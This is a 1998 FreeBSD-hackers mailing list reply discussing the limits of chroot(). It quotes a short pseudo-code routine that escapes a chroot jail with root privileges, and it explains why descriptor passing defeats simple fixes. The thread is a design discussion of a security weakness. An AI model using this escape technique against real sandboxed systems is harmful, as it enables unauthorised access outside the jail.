From owner-freebsd-hackers Tue Nov 17 12:20:59 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA06290 for freebsd-hackers-outgoing; Tue, 17 Nov 1998 12:20:59 -0800 (PST) (envelope-from owner-freebsd-hackers@FreeBSD.ORG) Received: from alpo.whistle.com (alpo.whistle.com [207.76.204.38]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA06285 for ; Tue, 17 Nov 1998 12:20:58 -0800 (PST) (envelope-from julian@whistle.com) Received: (from daemon@localhost) by alpo.whistle.com (8.8.5/8.8.5) id MAA13979; Tue, 17 Nov 1998 12:10:46 -0800 (PST) Received: from current1.whistle.com(207.76.205.22) via SMTP by alpo.whistle.com, id smtpdj13975; Tue Nov 17 20:10:42 1998 Message-ID: <3651D810.42877E5C@whistle.com> Date: Tue, 17 Nov 1998 12:09:52 -0800 From: Julian Elischer Organization: Whistle Communications X-Mailer: Mozilla 3.0Gold (X11; I; FreeBSD 2.2.7-RELEASE i386) MIME-Version: 1.0 To: Eivind Eklund CC: Mike Smith , Harold Gutch , zhihuizhang , hackers Subject: Re: Question on chroot() References: <19981115200813.B12524@foobar.franken.de> <199811152056.MAA14163@dingo.cdrom.com> <19981117125419.28799@follo.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-hackers@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG Eivind Eklund wrote: > > On Sun, Nov 15, 1998 at 12:56:03PM -0800, Mike Smith wrote: > > > On Sun, Nov 15, 1998 at 09:56:32AM -0800, Mike Smith wrote: > > > > Breaking out of a chroot'ed environment is less easy if you're not > > > > root > > > Is this meant to be read as "more or less impossible", that is, > > > impossible unless the user can become root first (due to insecure > > > suid-root binaries in the chroot-environment etc.), or can users > > > really break out in more or less every situation (of course > > > assuming stuff like that they don't have any open filehandles > > > pointing to the outside in the beginning). > > > > It's quite difficult to break out of a chroot'ed environment, yes, and > > it's intended to be impossible, so obviously you can only get out > > through flaws in the implementation... > > It is easy if you have root privileges inside the "jail". > > /* pseudo-code */ > mkdir("mybreakdir", 0700); > breakfd = open(".", 0, 0); > chroot("mybreakdir"); > fchdir(breakfd); > for (i=0; i<1000; i++) > chdir(".."); > chroot("."); I think I posted that a few years ago :) I looked for it in the archives but couldn't find it.. where was it :-) > > I'm not sure if you need the fchdir(); chroot() is not supposed to > affect your current directory. I don't think anybody has fixed the > above problem; it seems quite difficult to fix (you have to know which > FDs are inside and outside the jail, which is non-trivial). You can test all fds that are directories to see if they are outside the chroot, and fail the chroot if there are any such. However it doesn't help because you can fork, open a unix domain socket, and have the child do the chroot and then have the parent send it an fd that would have made the chroot fail. result.. chroot is only useful for friendly or non-root processes. there could be a few things that would fix this.. e.g. don't allow recursive chroots but it's trickier than it first appears. > > Eivind. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-hackers" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-hackers" in the body of the message